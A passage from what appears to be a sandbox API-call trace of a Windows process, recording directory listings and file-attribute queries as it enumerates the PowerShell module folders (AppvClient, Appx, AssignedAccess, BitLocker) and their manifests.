ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x11f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVClientCmdlets.format.ps1xml", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppVClientCmdlets.psm1", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25efd14c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x20ac84e, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0xacf38, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.AppvClientComConsumer.dll", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf90370be, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x1a938, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.AppVClientPowerShell.dll", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25efd14c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2a338, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.ClientProgrammability.Eventing.dll", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25efd14c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x208660d, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x208660d, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2a338, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.AppV.ClientProgrammability.Eventing.dll", cAlternateFileName="")) returned 0 [0332.141] FindClose (in: hFindFile=0x1a899960 | out: hFindFile=0x1a899960) returned 1 [0332.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.142] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.142] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\appvclient.psd1")) returned 0x20 [0332.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0332.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", lpFilePart=0x0) returned 0x4d [0332.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0332.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1", lpFilePart=0x0) returned 0x4d [0332.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\AppvClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\appvclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2409fd8 | out: lpFileInformation=0x2409fd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdafda4f6, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x25ed4aeb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x2b2)) returned 1 [0332.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0332.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x38, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0332.143] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a140 [0332.143] FindNextFileW (in: hFindFile=0x1a89a140, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.144] FindNextFileW (in: hFindFile=0x1a89a140, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1a42fc2e, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x14bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0332.144] FindNextFileW (in: hFindFile=0x1a89a140, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xf667de04, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x57f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0332.144] FindNextFileW (in: hFindFile=0x1a89a140, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x1a4c855e, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x1352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0332.144] FindNextFileW (in: hFindFile=0x1a89a140, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa16872ee, ftCreationTime.dwHighDateTime=0x1d5ace3, ftLastAccessTime.dwLowDateTime=0xa16872ee, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0332.144] FindNextFileW (in: hFindFile=0x1a89a140, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.144] FindClose (in: hFindFile=0x1a89a140 | out: hFindFile=0x1a89a140) returned 1 [0332.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.144] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0332.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0332.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x42, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0332.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0332.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x42, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0332.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240a810 | out: lpFileInformation=0x240a810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb833158, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x5f4eef68, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xeb833158, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x57f)) returned 1 [0332.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0332.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x42, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0332.145] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a899660 [0332.146] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.146] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25fe0370, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf667de04, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x25fe0370, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psd1", cAlternateFileName="")) returned 1 [0332.146] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25fe0370, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x3eec5ef, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x3eec5ef, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x3499, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess.psm1", cAlternateFileName="")) returned 1 [0332.146] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0332.146] FindNextFileW (in: hFindFile=0x1a899660, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0332.146] FindClose (in: hFindFile=0x1a899660 | out: hFindFile=0x1a899660) returned 1 [0332.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.146] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.146] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1")) returned 0x20 [0332.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0332.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x56, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0332.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x56 [0332.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x56, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0332.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1"), fInfoLevelId=0x0, lpFileInformation=0x240b138 | out: lpFileInformation=0x240b138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25fe0370, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdb1ca4b3, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x25fe0370, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1f6)) returned 1 [0332.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0332.148] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a680 [0332.148] FindNextFileW (in: hFindFile=0x1a89a680, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d3b574, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.148] FindNextFileW (in: hFindFile=0x1a89a680, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2bffca1, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.Format.ps1xml", cAlternateFileName="")) returned 1 [0332.148] FindNextFileW (in: hFindFile=0x1a89a680, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf667de04, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x31ac7f1c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x6ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psd1", cAlternateFileName="")) returned 1 [0332.148] FindNextFileW (in: hFindFile=0x1a89a680, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf7459824, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x49b98, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker.psm1", cAlternateFileName="")) returned 1 [0332.148] FindNextFileW (in: hFindFile=0x1a89a680, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0332.148] FindNextFileW (in: hFindFile=0x1a89a680, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf90370be, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 1 [0332.148] FindNextFileW (in: hFindFile=0x1a89a680, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ac7f1c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf90370be, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x2bffca1, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x2e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BitLocker.Structures.dll", cAlternateFileName="")) returned 0 [0332.149] FindClose (in: hFindFile=0x1a89a680 | out: hFindFile=0x1a89a680) returned 1 [0332.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.149] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1")) returned 0x20 [0332.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0332.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0332.149] GetFullPathNameW (in: 